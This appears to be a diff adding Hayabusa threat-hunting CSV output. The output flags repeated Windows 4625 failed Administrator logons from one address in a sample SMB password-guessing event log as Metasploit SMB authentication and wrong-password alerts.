+2016-09-20 01:51:37.528 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MQZwerVd6E08X8Ou  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.585 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dbDjtLKoX5Q77bn5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.625 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.669 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: O7BNKHiPjzJKCaDk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.669 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.714 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HHqBI8bzZn5VO9gq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.714 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.757 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Xz2ZO3b3QSh6Rdqt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.757 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.797 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IEfdhrwbTfCpCXKC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.797 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kc0LuQzAmQTIF1X3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.844 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.896 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WMZ70YmzpVp2h8mY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.896 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FFVr3Amq6mA3umiu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.945 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.985 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hnN15vqZcww8pqTK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.985 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.027 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sSuMRF1txQ9g2Mwi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.027 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.073 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tUuapChhs4CGO1cS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.073 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.119 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dIMr0hjIkwD8AaEG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.119 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.173 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8ww9HMQX0cqmolYQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.173 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.210 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XJRRZ5e9lARVZDar  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.210 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VvUzVoSLqFPAXSWE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.260 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.304 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SMMgPu1VJIjAWPDW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.304 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: I1JjIa4nOKDTLuAD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.337 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.377 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0J0GJIm1UUXHH9QJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.377 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.419 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YmVX3xIz0hrQFvPr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.419 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.470 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nv4tKFEmHjiXkVDI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.470 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.500 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: esdHHJl9LBek9pIo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.500 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.545 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MWofwwLjwiyBk39P  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.545 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.589 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dvsHFZe7Z1uJ9Dkv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.589 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8aDdgwvb1zsZF79k  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.629 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AQUb6CnMUtyrMNhF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.668 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KP5OxHPsbLHnIUBE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.701 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.744 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Ysg903vYFhQHYvFJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.744 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IySarHtsTvwSP56H  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.793 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GnUy8tbCIAVnmhDg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.828 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.863 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bfBtc4MnMtPG6MpC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.863 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 37b8MGIHY8QwXf9K  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.901 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eDuaWikplDmJNmIE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.945 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.989 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0kSSoAYJILHCPI7K  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.989 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.023 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: L9ikrtTGcZYU1556  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.023 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.064 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ypyd6SagvUXQHhtZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.064 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.100 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QWS37lIJ3Q6ghgMs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.100 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: H211KmFImpBRwTGW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.149 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 64tO5iBehXQcNc49  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.193 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xvxDngRj3j5TAwST  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.236 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.281 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: O8VYRjMnxDgUTWYf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.281 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.331 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EhWphTesbUf0hwi1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.331 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MO8VRRVANxIkDzEX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.385 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.429 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ziSXANiDAf7LRFz5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.429 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.527 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: g0CvYYtyEcU2riBX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.527 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
